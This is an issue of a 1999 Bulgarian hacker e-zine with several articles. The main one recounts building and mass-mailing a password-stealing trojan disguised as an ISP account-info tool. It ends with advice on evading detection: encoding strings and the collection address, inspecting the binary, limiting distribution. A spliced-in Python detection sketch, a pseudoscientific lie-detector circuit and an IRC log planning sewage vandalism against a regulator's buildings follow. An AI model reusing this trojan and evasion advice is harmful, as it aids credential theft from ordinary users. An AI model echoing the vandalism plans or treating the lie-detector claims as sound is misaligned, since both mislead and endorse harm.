 Ahhh, how glad I am to be finished - it's unreal. I am very glad that I cut
 it in half, and even so it looks big to me. Just thinking about how many
 people will rush off to build the amplifier or that thing with the
 home-made tr.... why don't I go and have a cold... beer. Not to mention
 Stoiko & 1/2, who will surely curse me for the competition. etc. etc... Bad
 business. Hmmm, was it in PHM#1 that it said "Finished to the sounds of
 2nd_pm.s3m?" - Same here. Only the date is different.

                                                                One ZLO_PSE.
                                                        /signature and stamp/

 >> EOA <<

 -·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·#17·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-
  [ a r t i c l e ]                                         [ a u t h o r ]
  Trojan Horse History                                        Solar Eclipse
 -·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-

     I. Introduction

 This article is about times long gone. About the times when the Internet
 was arriving in Bulgaria. About the times when BBSes were still in fashion.
 About the times when CIS was the main Internet provider for the youth.
 Whoever was there knows. Whoever was not has not missed much :-)

     II. The Problem

 At the time in question, more precisely the autumn of 1997, the problem of
 Internet access was very serious. The Bulgarian ISPs were asking downright
 incredible sums; Digsys, for example, wanted 5 lv/KB at a time when one
 dollar was 60 lv. CIS, for its part, was slow and very often busy. The
 situation was grim.

 This made a group of former BBS people sit down and start thinking about
 the question "How do we catch a few accounts at some Bulgarian provider?"
 One of the solutions was the following: the provider TechnoLink (at that
 time everyone's favourite because of its high speed) had 2 CGIs on its web
 page. One gave access to the user's data (hours used, etc.). The other was
 a web interface to finger, showing the names of all users logged in at the
 moment. It was not that hard to write down the names from finger and then
 try them all in the statistics CGI. There were users whose password matched
 their username. Unfortunately there were not many. Some more effective
 method had to be devised.

     III. The Idea

 Then one of the BBS people had an idea: a trojan horse! It should not be
 forgotten that at that time there was no BO, no NetBus, nothing. Trojan
 horses were not widespread, and I personally had never heard of anyone
 using a trojan horse for anything other than formatting the victim's hard
 disk.

 So the idea of using a horse to take (steal?) some user's password was
 something new. Unfortunately none of us knew exactly how to do it. Our
 knowledge of Windows programming was, frankly, modest. One of the ideas was
 to drop the connection somehow and then catch the password with keyboard
 capture when the user reconnected. The connection had to be dropped
 deliberately, because we had no idea how to start a keyboard capture
 process that would not close when the user closed the program containing
 the horse. So the user had to receive the program by email, run it, it had
 to drop him, and he had to reconnect before closing the program.

 This idea was rejected because of our obvious inability to implement it.
 The next idea was much better: why go to the trouble of catching the
 password with keyboard capture when we can get the user to enter it
 himself. Thus the trojan horse TLinkInf was born, in other words
 "Techno-Link Info Center". The idea was to write a front-end for the
 Techno-Link web page that gives account information. Our program would ask
 the user for a name and password, connect to www.techno-link.com, simulate
 submitting the name and password through a browser, parse the web page with
 the results and show those results on the screen. The name and password
 would also be sent by email to the authors (this, naturally, was not
 described in the documentation).

     IV. The Implementation

 The trojan horse was written in Delphi. Today I would be ashamed to write
 in Delphi, but back then we wrote in whatever we had at hand and whatever
 we could. You cannot imagine how many things we learned while writing the
 horse. Whoever says hacking has no real benefits is wrong. In just a few
 weeks, without any prior knowledge, I learned almost by heart the HTTP
 protocol, the SMTP protocol, the basics of socket programming and the IP
 address of Techno-Link. Even then I came to the conclusion that reading
 RFCs without knowing anything about the subject is very painful. To this
 day I have not changed my mind.

 The source consists of 3 units - MainUnit, AboutUnit and HelpUnit.
 AboutUnit and HelpUnit took care of displaying the About and Help boxes on
 the screen. The real work was done in MainUnit.

 The horse was quite polished in appearance: it had nice buttons, a pretty
 icon, even a logo. For its distribution we had also written a README.TXT. I
 think this contributed a lot to its success, because the main problem in
 writing horses is how to get users to trust you. Especially when you want
 them to type in their name and password.

 A few interesting details: all the strings in the horse were encoded. This
 is a good idea for protection against users who decide to look at the file
 with a hex editor before running it. Not everyone will be fooled, but it
 still does no harm.

 Unfortunately Delphi adds to the exe the names of all classes that are
 used. And the horse had a class SMTPClient, with methods
 SMTPClientDisconnect, SMTPClientConnect and so on. And all of this is
 visible in the exe file. Through lack of experience, it had not occurred to
 us to look at the exe before sending it, so the point of the encoded
 strings was lost.
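
 Seen from the receiving side, the same leak is a triage signal: a program
 presented as an account-info viewer that carries SMTP client names deserves
 a closer look before it is run. The sketch below is an added example, not
 code from the article or from tlinkinf.zip; the sample bytes are
 constructed, the SMTP verb list is an assumption, and the length-byte check
 assumes names stored as Pascal short strings.

```python
import re

# Names the article says stayed readable in the compiled file.
PAGE_IDENTIFIERS = ("SMTPClient", "SMTPClientConnect", "SMTPClientDisconnect")
# Assumption, not from the article: SMTP verbs that show up in a mail-sending
# program whose protocol strings were left unencoded.
SMTP_VERBS = ("HELO", "MAIL FROM", "RCPT TO")


def extract_strings(data, min_len=4):
    """Return (offset, text) for each printable-ASCII run of min_len+ bytes."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [(m.start(), m.group().decode("ascii")) for m in pattern.finditer(data)]


def is_length_prefixed(data, offset, text):
    """True when the byte just before the run equals the run's length.

    Assumption: compiler-emitted class and method names are stored as Pascal
    short strings (one length byte followed by the characters), so a match
    suggests a type or method name rather than ordinary program text.
    """
    return offset > 0 and data[offset - 1] == len(text)


def classify(text):
    """Return why a string looks mail-related, or None when it does not."""
    if text in PAGE_IDENTIFIERS:
        return "identifier named in the article"
    if "smtp" in text.lower():
        return "SMTP-related identifier"
    if any(verb in text.upper() for verb in SMTP_VERBS):
        return "SMTP protocol verb"
    return None


def triage(data):
    """List every readable string that hints at mail-sending capability."""
    findings = []
    for offset, text in extract_strings(data):
        reason = classify(text)
        if reason:
            findings.append({
                "offset": offset,
                "text": text,
                "reason": reason,
                "length_prefixed": is_length_prefixed(data, offset, text),
            })
    return findings


def build_sample():
    """Constructed stand-in for a compiled 'info center' tool, not a real file.

    The SMTP verb is masked with a one-byte XOR to mimic encoded strings,
    while the class and method names are left readable, as the article
    describes.
    """
    def short(name):  # Pascal short string: length byte + characters
        return bytes([len(name)]) + name.encode("ascii")

    masked = bytes(b ^ 0x5A for b in b"MAIL FROM:<user@example.invalid>")
    return (b"MZ\x90\x00" + b"\x00" * 12
            + short("TMainForm") + b"\x00\x01"
            + short("SMTPClient") + short("SMTPClientConnect")
            + short("SMTPClientDisconnect") + b"\x00\x02"
            + masked + b"\x00")


if __name__ == "__main__":
    for hit in triage(build_sample()):
        kind = "type/method name" if hit["length_prefixed"] else "plain string"
        print(f"0x{hit['offset']:04x}  {hit['text']:<22} {hit['reason']} ({kind})")
```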

 Another example of a compiler that stuffs things into the exe that should
 not be there is lcc-win32. When the executable is linked, part of the
 source almost always ends up in the executable file. This is not good at
 all. I assume the linker uses memory where source was previously located
 and does not clear it. Either way, the moral is that you must always look
 at your horse with a hex editor before distributing it.

 I would also advise you to encode what you send as well. There is nothing
 dumber than someone catching your horse, over which you have sweated for
 months, grabbing the first hex editor that comes to hand and changing the
 email to which the results are delivered. If you use a hex editor, you can
 be sure the results can only be used by you (and by the people who have
 broken your encoding)

     V. The Source

 The source is in the file tlinkinf.zip, distributed together with phm21.
 There you will also find the README.TXT file that was attached to the
 horse. I have also added tlinkinf.exe, a compiled version of the trojan. I
 have slightly modified the exe so that it cannot be used for real purposes,
 but the source is complete.

     VI. The Bitter End of the Story

 At long last the horse was ready. It came out as a zip archive of more than
 300 KB. We sent it as an email attachment and started waiting for results.
 In just two days 30 accounts had been caught, filling us with joy, pride
 and love for the motherland and its native ISPs. But our joy was
 short-lived. Unfortunately we had made the typical mistake of the beginner
 hacker: excessive greed. The trojan was sent to ALL the users of
 techno-link. Not to one, not to 10, but to the full user list. Of course,
 the very next day the Techno-Link admin sent an email to all users
 containing the following words (approximately): "The program TLinkInf sends
 your password to a hacker address. If you have used it, change your
 password". Within a few days all our accounts had gone bust.

     VII. Some Advice

 Here is some advice for beginner horse-breeders.

     1) Do not use Delphi
     2) Do not be greedy - do not send your horse to 1000 people.
     3) There are users dumber than you (almost all of them)
     4) There are sysadmins smarter than you (but not all of them)
     5) Read RFCs.
     6) Use encoding for the strings and for the email you send.
     7) Do not be greedy - I have said this already, but it is very important.

 >> EOA <<

 -·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·#18·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-
  [ a r t i c l e ]                                         [ a u t h o r ]
  Echo from the Meeting with KPD at NDK                                 EXo 
 -·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-

 Whether you heard about it or not, on 14 September 1999 a meeting with KPD
 and DKD was held in hall 8 of the NDK to discuss the licensing. Here I have
 briefly presented my impressions of what was said during the discussion.
 The meeting was attended by BTK people and representatives of the ISPs, as
 well as assorted clueless types (like me, say ;) and a kilo of journalists,
 who clearly had no idea where they were going and what they were supposed
 to do. Example: some reporter from the Trud newspaper, who shortly before I
 went in boldly asked me: "Hey, I heard about some hacker gathering...(!) ..
 is this the place?", at which point I was already sorry I had looked at
 her, because I was hit by a whiff reminiscent of low-grade counterfeit
 rakia. Veni Markowski, for his part, must have been captured on at least 50
 or so rolls of film, since those types from the press were falling over
 themselves to snap him (especially at the moment when he appeared in the
 hall with a small "licensed" crew, shackled in handcuffs :)).

 The agenda of the seminar was as follows: Intro (some twerp), after him
 some boss at KPD talked about KPD (he was rather sleepy and you could
 barely make out what he was saying), then a guy from DKD (who clearly
 fancied himself a great authority) spoke, and finally came the discussion,
 which was in fact the most interesting part of the whole party.

 First at the microphone, contrary to all expectations, was not Veni but
 some gentleman whose name I do not remember. Right after the first
 questions he asked, however, it became clear to everyone in the hall (incl.
 the ridiculous representatives of the press) that answers would be given
 only to questions that could be answered evasively enough that it would not
 be clear what exactly had been said. Heated arguments began, which at times
 were backed by brilliant legal tricks on both sides. The legislation of
 most European countries was cited and examples were given from public
 opinion surveys that had been carried out (not one of them was the work of
 KPD/DKD/BTC).

 Some of the people who asked questions and/or voiced an opinion were: Boris
 Basmadview (Bulnet), Teodor Zahow (Spectrum Net), Mr Zaprqnow (Orbitel),
 Dragomir Slavov (DigSys), Veni Markovski, Dimiter Ganchev and others. Not
 one of them spoke favourably of the licence.

 The sad thing, however, is that at the gathering point (Popa), which was
 supposed to be the start of a kind of mini procession-protest against the
 licensing, too few people turned up, even though the event had been
 announced publicly in quite a few places.

 >> EOA <<

 -·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·#19·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-
  [ a r t i c l e ]                                         [ a u t h o r ]
  Lie Detector                                                 Stoiko & 1/2
 -·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-

 I disagree with this article in principle: a person can sweat from sheer
 anxiety, for example when unjustly accused, so this does not work....

 Do you always want to know the truth? Yes, of course. But built into the
 human brain is a thing called lying. Bad business. But the device we are
 going to look at puts an end to this human bug. Well, sometimes it is nice
 to lie, but when we are the ones being lied to it is bad. So this device
 can be applied to:

  - people
  - men
  - women

  It does not work on:

  - all kinds of animals and people with fur.

 Why, you will understand once I describe how the detector works. This thing
 has many applications. It can be built compactly, since a 9V battery is
 used for power. So if you have doubts about someone, you tell him: "Hey,
 put this thing on your finger and let's see".

 Or you can build it into a chair, but whoever sits down must be wearing
 short pants or a miniskirt (best), and you mount the visual part by the
 desk or another hidden place from which you can steal a glance at when the
 one in front of you is lying to you.

 Here is the schematic: (it came out a bit clumsy, but ...)
 
                                                 /
               _______________________________./   .------. +9V
               |     ___                     |   K
               |     | |R2                   |
               |     | |3.3kohm  ____       ___
               |     ---    -  /      \  +  | |
  00000---------      |-------|  1mA  | --->| |R4  1kohm
                 T  |/      |  \ ____ /  |  | |
  00000--|||||------|       |            |  ---
        R1     |    |\>     |     />     |   |
      220kohm  |      |     |__|-/---|___|   |
               |      |     |  |/----|       |
             _____    |     |__/            ___  R5
         C1  _____    |         R3 1kohm    | | 220ohm
   0.1 microF  |      |                     | |
               |      |                     ---
               |______|______________________|_____________. 0
                                             |
                                            ---
   T - transistor BC107

 So how does this marvel work? It really comes down to an ordinary
 measurement of skin resistance. Normally, dry human skin does not conduct
 current, that is, it has a very high resistance. Pure water is also a very
 poor conductor. So when a person lies (and that often happens when getting
 hold of other people's passwords) he gets agitated and sweats. Human sweat
 contains salts and presents a low resistance to the current. Therefore the
 skin resistance shows when a person is lying.

  Designations in the schematic:

  - The round thing (it is not all that round, but...) is a milliammeter. The
    result is read from it.
  - R4 and R3 - variable resistors.
  - 00000 and 00000 - two metal plates that touch the skin.
  - K - switch for turning on the power.

 For the first measurement (before the question) the device is zeroed with
 R4, and at the second measurement, after the question, the change in skin
 resistance is read off. If it has changed, he is lyyyyyyyying. And hop, the
 lie turns out to have short legs. The detector's sensitivity is set with R3.
 The two plates can be fitted into a bracelet so that it is easier to put on.
 It is not hard to build. I hope this device comes in handy!

 >> EOA <<

 -ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú#20ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
  [ a r t i c l e ]                                         [ a u t h o r ]
  Blue in the Dark                                                    Xoduz
 -ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-

	"Blue In The Dark"  - v1.0 beta 2
			or
	 Fears in the dark 8 years later
	=================================
	Music:	Iron Maiden '91
	Lyrics:	XoDuZ '99
 	================================= 
 1.	
 	I am a man who sits alone
	And when I'm watching Windows' blow,
	At night or scrolling through tabs,
	When the screen begins to change
	I sometimes feel a little strange -
	A little SUXious when it's dark.

 Refrain:
	Blue in the dark, blue in the dark ...
	I have the constant fear that crash is always near.
	Blue in the dark, blue in the dark ...
	I have the phobia that other bug is always there.

2.
	Have you run your pointer down the wall,
	And have you felt your Windows'll blow,
	When you're searching for the "Start" ?
	Sometimes when you're scared to take a look
	at the corner of the room
	you've sensed that Bill Gates' watching you ?
	Have you ever been alone at night,
	Thought you've run the new "Crash Guard",
	A look around and the icon's there ?
	And when you press the button's face,
	You find it hard to look again,
	Because you're sure that Blue Screen's there ?

 Refrain:...

 3.	Watching Linux win's the night before,
	Debating Windows and its blows,
	The unknown troubles on your mind.
	Maybe Bill Gates is playing tricks,
	You sense, and suddenly eyes fix
	on exception message from behind.

 Refrain:...

	When I'm watching Windows' blow
	I am the man who sits alone...
	=================================

 >> EOA <<
 -ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-

 >> EOI <<










































    #21 #21 #21 #21 #21 #21 #21 #21 #21 #21 #21 #21 

    [no comment]

   irc://irc.ntrl.net#phm, Mon May 24 13:42:03 EST 1999

 <IronCode> hey, I support ManiaX's idea - to smear the administrative
            building(s) with shit
 <kay>      IronCode: I'm 'for' it too, with both hands :-)
 <IronCode> hello ;-)
 <IronCode> heheh ;-)
 <PinkHat>  hi
 <darcosi>  well, I support that too
 <darcosi>  hi
 <PinkHat>  well, who doesn't support it?
 <kay>      we'll find a sewage truck somewhere... do they work for pumping
            out as well as for sucking in ?
 <IronCode> kay: naturally, they have to be emptied somehow
 <PinkHat>  why don't we order a ton of shit over the Internet and then renounce
 <IronCode> ehh... then it's the state that will cash in :-(
 <PinkHat>  more precisely, in favour of BTC
 <darcosi>  well, there are a lot of buildings in Sofia, but never mind, how
            will that much shit be found
 <kay>      if only the shit were your problem ...
 <IronCode> well how... aren't there enough of us? ;-) with a little effort
            we'll collect it ;-)
 <kay>      if need be we'll take it from their own toilets
 <PinkHat>  :-)
 <PinkHat>  I have a friend who shits twice a day, he'll be a big help
 <kay>      some biologists from our high school told me about some mixture
            that you put in the toilet and then... it sort of 'swells up' and
            it turns into a big party :-)
 <IronCode> ahh, yes, that works ;-)
 <PinkHat>  we'll buy ourselves plenty of BIZALAX
 <IronCode> tried and tested...
 <darcosi>  oh yes, I know that one too
 <IronCode> but it gets cleaned up, man...
 <IronCode> if they're on the sewer system - too bad
 <IronCode> but if they're on a septic pit.... ;-) ;-)
 <PinkHat>  :)
 <darcosi>  we'll show BTC what's what ;)))
 <IronCode> heh ;-)
 <IronCode> someone with logs, send this to EXo for PHM ;-)












EOF